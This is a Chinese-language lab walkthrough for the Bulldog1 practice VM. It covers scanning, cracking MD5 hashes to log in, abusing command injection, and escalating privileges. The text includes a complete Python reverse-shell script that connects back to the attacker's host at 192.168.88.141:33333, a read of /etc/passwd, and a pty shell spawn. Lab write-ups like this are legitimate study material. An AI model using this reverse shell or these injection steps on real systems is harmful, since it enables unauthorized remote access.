Bulldog1

一、 收集信息

1、 扫描存活主机，找到目标机的ip

2、 扫描目标机的端口信息。

说明可以通过80或8080来访问它
3、 查看一些指纹信息

4、因为是自己搭的所以不需要被动收集

二、 web渗透

1、通过访问发现没有神什么可用信息，就两个页面，审查里面元素也没有可用信息。


2、 扫目录


扫出来目录不多，可以打开看看，也可以用自己的字典
多了一条
http://192.168.88.128/robots.txt

3、 自己尝试敏感目录

3.1、发现后台

3.1.1、尝试弱口令登录
结果失败
也可以爆破，但是用户名和密码都知道，很难。
3.1.2、审查元素

好像32md5，但是通过md5解不出来
最后发现浏览器不一样，这个值也不一样，感觉放弃
3.2、查看其他页面最终发现

3.2.1、解密md5







没钱的话，去其他网站解密

3.2.2、通过上面发现这两条md5的对应的是

3.2.3、猜测@前面的是他的账号，然后尝试登陆。
nick--------bulldog
sarah-------bulldoglover

登陆成功。
3.2.4、 再次访问web-shell页面

但是只能执行上面的命令。其他的命令不可以。所以需要获取shell

三、 获取shell

1、发现有命令注入

2、前面信息收集发现他是python写的，所以可以执行python脚本，我们用echo写一个python脚本，来反弹shell。

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.88.141",33333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

等等
3、然后在kali用nc监听33333端口，在执行pwd&1.py

执行pwd&1.py

4、 得到shell

5、 但是发现权限是不够的

四、 提权

1、查看用户信息
cat etc/passwd

发现这两个用户值得关注
2、看家目录

每个都进去查看
3、 最后发现


打开是数据流看不懂

利用strings查看可执行文件中的内容；（strings命令用来提取和显示非文本文件中的文本字符串）

得到：SUPERultHimatePASHSWORDyouHCANTget 尝试去掉其中的H
SUPERultimatePASSWORDyouCANTget
意思是：你得到了特别伪装的最终密码

4、 尝试密码

su命令不能执行；
用python命令打开一个新的终端，尝试进行提权，输入命令： python -c ‘import pty; pty.spawn("/bin/bash")’

提权成功